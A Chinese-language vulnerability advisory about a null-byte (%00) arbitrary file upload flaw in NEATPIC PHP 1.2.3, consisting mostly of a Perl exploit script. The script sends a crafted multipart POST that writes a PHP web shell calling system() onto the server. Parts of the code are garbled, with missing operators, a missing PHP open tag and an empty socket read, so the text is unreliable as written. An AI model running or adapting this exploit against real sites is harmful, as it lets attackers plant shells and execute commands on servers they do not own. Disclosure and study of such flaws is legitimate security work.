危害:直接上传任意文件
漏洞描述:
当PHP程序有指定PATH时,在PATH文件后门加入%00可以上传任意文件.
测试程序:NEATPIC PHP目录直读版 1.2.3
http://web.cncode.com/SoftView.asp?SoftID=1820
此文档参与者:
漏洞实验者:Xiaolu,Lilo,SuperHei,Darkness [All BST Members]
Http://Www.Bugkidz.org
Xiaolu提供了一个漏洞利用程序:
#!/usr/bin/perl
$
= 1;
use Socket;
$host = "127.0.0.1";
$port = "80";
$UploadTo = "";
$str =
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"path\"\r\n".
"\r\n".
"./php.php%00\r\n".
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"image\"; filename=
\"F:\\tools\\1.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
""system($c);\r\n".
"?\r\n".
"-----------------------------7d41f4a600472--\r\n".
"\r\n";
print $str;
$len=length($str);
print $len;
$req ="POST /index.php?action=upload HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/msword, application/x-shockwave-flash, */*\r\n".
"Referer: http://127.0.0.1/index.php?path=.\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=----------------
-----------7d41f4a600472\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n".
"Host: 127.0.0.1\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie: PHPSESSID=111111111111111111111111\r\n".
"\r\n".
"$str\r\n\r\n";
print $req;
@res = sendraw($req);
print @res;
#Hmm...Maybe you can send it by other way
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host)
die("inet_aton problems\n");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
0)
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$
= 1;
print $req;
my @res = ;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect...\n");
}
}